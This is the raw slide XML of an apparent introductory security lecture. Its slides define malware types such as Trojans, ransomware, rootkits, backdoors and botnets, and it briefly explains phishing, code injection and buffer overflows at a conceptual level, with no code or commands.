            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Humans a risk too via phishing and social-engineering attacks</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>But can too much security be a problem?</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500">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2eca6215655_0_1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22</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="Google Shape;138;g2eca6215655_0_1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2eca6215655_0_16"/>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2eca6215655_0_16"/>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41" name="Google Shape;141;g2eca6215655_0_16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="32991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Many variations, many names</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b="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Trojan Horse</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Code segment that misuses its environment</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Exploits mechanisms for allowing programs written by users to be  executed by other users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Spyware, pop-up browser windows, covert channels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Up to 80% of spam delivered by spyware-infected systems</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="45720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142" name="Google Shape;142;g2eca6215655_0_16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5879223" y="3290850"/>
            <a:ext cx="1647474" cy="16934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a5eb945af_0_3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23</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;148;g2ea5eb945af_0_3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2ea5eb945af_0_3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g2ea5eb945af_0_3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51" name="Google Shape;151;g2ea5eb945af_0_30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="18009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Trap Door</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Specific user identifier or password that circumvents normal  security procedures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Could be included in a compiler</a:t>
            </a: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152" name="Google Shape;152;g2ea5eb945af_0_30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2745525" y="2571788"/>
            <a:ext cx="2100546" cy="220068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2ec801cac4e_0_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24</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Google Shape;158;g2ec801cac4e_0_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2ec801cac4e_0_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2ec801cac4e_0_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61" name="Google Shape;161;g2ec801cac4e_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="279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Ransomware</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Malware that encrypts the user's data and demands a ransom for the decryption key.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result in loss of access to critical data and financial loss if ransom is paid.</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Examples include WannaCry, which targeted Windows systems.</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ec801cac4e_0_1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25</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Google Shape;167;g2ec801cac4e_0_1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2ec801cac4e_0_11"/>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2ec801cac4e_0_11"/>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70" name="Google Shape;170;g2ec801cac4e_0_11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="279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Spyware</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Malware that secretly monitors and collects information about a user's activities.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lead to privacy breaches and theft of sensitive information.</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Examples include Keyloggers that record keystrokes to capture passwords.</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171" name="Google Shape;171;g2ec801cac4e_0_11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="23913"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4877250" y="2831100"/>
            <a:ext cx="3702900" cy="1817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ec801cac4e_0_2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26</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Google Shape;177;g2ec801cac4e_0_2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2ec801cac4e_0_21"/>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2ec801cac4e_0_21"/>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80" name="Google Shape;180;g2ec801cac4e_0_21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="25500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Adware</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Software that automatically displays or downloads advertising material.</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be intrusive and degrade system performance.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Pop-up ads and unwanted toolbars in web browsers.</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181" name="Google Shape;181;g2ec801cac4e_0_21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5312000" y="2721616"/>
            <a:ext cx="3414600" cy="21281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2ec801cac4e_0_32"/>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27</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Google Shape;187;g2ec801cac4e_0_32"/>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g2ec801cac4e_0_32"/>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2ec801cac4e_0_32"/>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190" name="Google Shape;190;g2ec801cac4e_0_32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="279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Rootkits</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Software that hides the presence of malware by altering the operating system.</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provide continuous, privileged access to a computer while avoiding detection.</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Sony BMG rootkit, which hid DRM software on infected computers.</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191" name="Google Shape;191;g2ec801cac4e_0_32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="17607"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4893950" y="2949575"/>
            <a:ext cx="3214850" cy="198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ec801cac4e_0_4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28</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Google Shape;197;g2ec801cac4e_0_4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2ec801cac4e_0_44"/>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2ec801cac4e_0_44"/>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200" name="Google Shape;200;g2ec801cac4e_0_44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="30426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Backdoors</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Methods by which unauthorized users can bypass normal authentication to access a system.</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Allows attackers to remotely control and access systems without detection.</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Back Orifice, a backdoor trojan used for remote control of a Windows machine.</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201" name="Google Shape;201;g2ec801cac4e_0_44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4974300" y="3165688"/>
            <a:ext cx="3028950" cy="1514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ec801cac4e_0_5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29</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="Google Shape;207;g2ec801cac4e_0_5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g2ec801cac4e_0_56"/>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2ec801cac4e_0_56"/>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210" name="Google Shape;210;g2ec801cac4e_0_56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="279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Botnets</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Networks of infected computers controlled by a single attacker.</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Used to launch large-scale attacks, such as DDoS attacks, or to distribute spam.</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The Mirai botnet, which infected IoT devices to perform DDoS attacks.</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211" name="Google Shape;211;g2ec801cac4e_0_56"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="14133"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4070200" y="2715875"/>
            <a:ext cx="4229800" cy="2033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a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Google Shape;84;p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txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1926175" y="200975"/>
            <a:ext cx="5502600" cy="8262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Avoiding inconvenient software update reboots</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="87" name="Google Shape;87;p3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="8619" t="7355" r="10058"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6013250" y="2303276"/>
            <a:ext cx="2956184" cy="1891087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Google Shape;88;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="1027175"/>
            <a:ext cx="75912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Windows 10 is, in many ways, a truly internet-based operating system. Mostly, this is a bonus but there are times when it isn't – and Microsoft's attitude towards operating system updates is one such time.</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Google Shape;89;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="2128100"/>
            <a:ext cx="5312700" cy="27756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The most annoying part of automatic updates in the Windows 10 is the restarting, which can seemingly come at random (and inconvenient times).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The simplest way to counteract this is to head to Windows Update (in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Settings &gt; Update &amp; Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>), click on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Advanced Options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t> and then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Notify to Schedule Restart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>, which means the OS will request a reboot instead of interrupting everything you’re working on.</a:t>
            </a:r>
            <a:endParaRPr sz="16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2ec801cac4e_0_6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30</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Google Shape;217;g2ec801cac4e_0_6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2ec801cac4e_0_68"/>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2ec801cac4e_0_68"/>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a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Google Shape;220;g2ec801cac4e_0_68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="2796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Phishing</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Fraudulent attempts to obtain sensitive information by disguising as a trustworthy entity in electronic communications.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lead to identity theft and financial loss.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Emails that mimic legitimate institutions requesting personal information.</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pic>
        <p:nvPicPr>
          <p:cNvPr id="221" name="Google Shape;221;g2ec801cac4e_0_68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5295325" y="2725400"/>
            <a:ext cx="2699259" cy="202445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ea5eb945af_0_5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31</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Google Shape;227;g2ea5eb945af_0_5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g2ea5eb945af_0_5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2ea5eb945af_0_5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 </a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;g2ea5eb945af_0_50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="36633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Malware - Software designed to exploit, disable, or damage computer</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Spyware – Program frequently installed with legitimate software  to display ads, capture user data</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Ransomware – locks up data via encryption, demanding, payment to unlock it</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Others include trap doors, logic bombs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All try to violate the Principle of Least Privilege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Goal frequently is to leave behind Remote Access Tool (RAT) for repeated access</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="45720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2ea5eb945af_0_4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32</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;236;g2ea5eb945af_0_4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2ea5eb945af_0_4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2ea5eb945af_0_4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Four-layered Model of Security</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="239" name="Google Shape;239;g2ea5eb945af_0_40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1855475"/>
            <a:ext cx="8839198" cy="16683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2ea5eb945af_0_134"/>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33</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Google Shape;245;g2ea5eb945af_0_134"/>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g2ea5eb945af_0_134"/>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2ea5eb945af_0_134"/>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 </a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="248" name="Google Shape;248;g2ea5eb945af_0_134"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="790613" y="1179900"/>
            <a:ext cx="7562775" cy="3191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ea5eb945af_0_6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34</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Google Shape;254;g2ea5eb945af_0_6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2ea5eb945af_0_6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2ea5eb945af_0_6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Code Injection</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Google Shape;257;g2ea5eb945af_0_60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="32889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Code-injection attack occurs when system code is not malicious but has bugs allowing executable code to be added or modified</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Results from poor or insecure programming paradigms,  commonly in low level languages like C or C++ which allow for  direct memory access through pointers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Goal is a buffer overflow in which code is placed in a buffer and</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execution caused by the attack</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Can be run by script kiddies – use tools written but exploit  identifiers.</a:t>
            </a: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ea5eb945af_0_14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35</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="Google Shape;263;g2ea5eb945af_0_14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g2ea5eb945af_0_146"/>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g2ea5eb945af_0_146"/>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Code Injection</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="Google Shape;266;g2ea5eb945af_0_146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="34272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Outcomes from code injection</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Frequently use trampoline to code  execution to </a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>exploit buffer  overflow</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="267" name="Google Shape;267;g2ea5eb945af_0_146"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3837900" y="651638"/>
            <a:ext cx="4994079" cy="2446987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="268" name="Google Shape;268;g2ea5eb945af_0_146"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5608087" y="3247749"/>
            <a:ext cx="1296599" cy="1502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2ea5eb945af_0_7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36</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Google Shape;274;g2ea5eb945af_0_7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2ea5eb945af_0_7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2ea5eb945af_0_7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Great Programming Required?</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
